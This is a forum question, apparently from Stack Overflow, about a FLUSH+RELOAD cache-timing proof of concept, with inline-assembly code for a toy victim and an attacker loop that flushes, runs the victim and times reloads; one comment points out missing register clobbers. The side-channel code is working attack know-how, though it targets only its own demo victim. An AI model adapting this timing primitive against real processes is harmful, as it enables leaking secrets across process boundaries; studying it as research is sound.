FLUSH + RELOAD Proof of Concept - Why do we need to flush more than needed?

Question

Problem

I am putting together a proof of concept for the FLUSH + RELOAD attack. The method is outlined in great detail in this paper. The general idea is simple - cached addresses can be accessed with much greater speed than addresses not in the cache. By clearing the cache, running a victim process that accesses certain memory locations, then timing accesses to possible memory locations, we can learn about what memory the victim accessed.

The concept behind my proof of concept is also simple. I create an array of 256 pointers, each referencing a 512-size block in memory. The first time the victim is called, it will generate a "random" byte based on the smallest byte of the CPU's time stamp counter. Every subsequent time the victim is called, it will load a single byte from the memory location referenced by that secret byte's index in the pointer array.

void victim() {
    unsigned int out;
    if (!initted) {
            asm __volatile__ (
                    "rdtsc\n"
                    "and rax, 0xff\n"
                    : "=a" (out)
                    : /* no inputs */
                    : /* no clobbers */
            );

            printf("Victim initialized. Secret byte: 0x%02x\n", out);
            initted = 1;
    }

    asm __volatile__ (
            "mov rsi, qword ptr [rbx + 8 * rax]\n"
            "lodsb\n"
            : /* no outputs */
            : "b" (ptrs), "a" (out)
            : "rsi"
    );

    return;
}

(Note that although the secret byte is saved to a global variable and printed to stdout, this is purely for observing the attack, and other procedures never access that value.)

My attack process is given below:

void attacker() {
    unsigned int i; unsigned int j; unsigned int ii;
    unsigned int t;

    for (j = 1; j <= 1000; j++) {
            // here is the FLUSH part of the attack
            for (i = 0; i < 256 + EXTRA; i++) {
                    asm __volatile__ (
                            "clflush byte ptr [rbx]\n"
                            : /* no outputs */
                            : "b" (ptrs[i])
                            : /* no clobbers */
                    );

            }

            // run the victim
            victim();

            // now, RELOAD and time
            for (i = 0; i < 256; i++) {
                    asm __volatile__ (
                            "mfence\n"
                            "rdtsc\n"
                            "mov rcx, rax\n"
                            "lodsb\n"
                            "lfence\n"      //ensure load happens
                            "rdtsc\n"       //before re-reading counter
                            "sub rax, rcx\n"
                            "clflush byte ptr [rsi - 1]\n"  //restore cache
                            : "=a" (t)
                            : "S" (ptrs[i])
                            : "rcx", "rdx"
                    );

                    times[i] += ((double) t - times[i]) / (double) j;
                    sched_yield();

            }


    }

    return;
}

The different parts of the attack are clearly outlined in the comments. First, we FLUSH the cache using Intel's clflush instruction on each of the pointers in the array. Then, we run victim(), which should access exactly one of the addresses in the array. Finally, we perform RELOAD and timing. The process is repeated 1000 times and the access times are averaged to provide reliable timings.

My question lies in the FLUSH part of the attack. Notice that I flush more than just the pointer array, but also some addresses (EXTRA = 32) higher than the array. Without this additional flushing (i.e., if we simply flush ptrs[i] for i = 0..255), the attack fails to yield significant timing differences for accesses to indices between 0xe8 and 0xff. I have attached screenshots of the attack for the extra flushes enabled (Fig. 1) and disabled (Fig. 2).

Figure 1. Leaking the secret byte 0xf1 when extra flushing is enabled.

Figure 2. Unable to leak secret byte (0xed) when there is no extra flushing.

Possible Explanations

It is possible that inside of the RELOAD loop, the CPU predicts that as it approaches the last few iterations, the extra performance gain that would be obtained by accessing the cache for a previously-saved value is overshadowed by the performance loss from visiting the cache for an address that has not shown up yet. To test this, I changed the for loop into a while loop and mixed up the accesses; i.e., I used an LCG-like accessing pattern where I start with index i_0, then go to (a * i_0 + b) % 256 and so forth. However, while the attack still works for low secret bytes, it still fails for all bytes above ~0xe8. If the loop prediction really was the problem, then we should expect to see a more random distribution of bytes that cannot be leaked, but this is not the case.

Although I am not completely sure, alignment of the 512-byte chunks is probably also not the problem. (Intel L-1 caches appear to be 8-way set associative with 64-byte line size.) I have ensured this by aligning each memory chunk to a grain size of 512.

Any ideas would be appreciated!

It looks like you missed the `edx` clobber for `rdtsc` in `victim()` and the `esi` clobber for `lodsb` in `attacker()`. Fix your code. If the problem persists, share your entire code, mention the compiler and options used and the CPU model the code is running on. — Hadi Brais, Jan 10 '21 at 15:01

FLUSH + RELOAD Proof of Concept - Why do we need to flush more than needed?

0 Answers0